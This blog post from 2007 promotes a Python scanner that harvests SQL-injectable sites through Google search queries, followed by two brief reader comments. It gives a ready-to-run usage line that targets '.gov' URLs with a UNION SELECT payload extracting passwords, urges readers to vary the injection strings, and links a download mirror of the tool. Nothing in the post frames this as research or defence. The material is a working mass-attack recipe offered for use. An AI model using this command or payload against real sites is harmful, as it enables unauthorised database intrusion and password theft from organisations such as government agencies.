SQL Injection Google Scanner

I’ve just found a nice python script of SQL Injection Google Scanner from here. It’s not just a single host SQL Injection Scanner , but its task is to collect hosts that vulnerable to SQL Injection by running Google search query. If you’re already familiar with Remote File Inclusion Scanner by Morgan , then you should be familiar with this one , too.

sql injection

usage :

python SQLscan.py -g inurl:’.gov’ 200 -s ‘/index.php?offset=-1/**/UNION/**/SELECT/**/1,2,concat(password)/**/FROM/**/TABLE/*’ -write sql_found.txt -v

It will scan for any site that contains ‘.gov’ in its URLs , and then they’ll be checked by inject a SQL Injection String (you could modify the strings as creative as you can be) , and make sure that your box is installed with python 1st :P .

To download the script , i’ve made a mirror of it , which is located here :

http://4r13-is-a.lamer.la/scrapts/SQLscan.py

Posted on September 14th, 2007 by admin in Sectools, Security , , , , ,

Top incoming search terms for this post:


    Related Posts

    Leave a Comments »

    Trackback | RSS 2.0

    1. stu - September 19, 2007

    Google hack rie? When you give tips how to hack Google? :d

    2. lain - September 19, 2007

    hahha…
    i can’t hack google , and i will never be able to .. :P


    Advertisement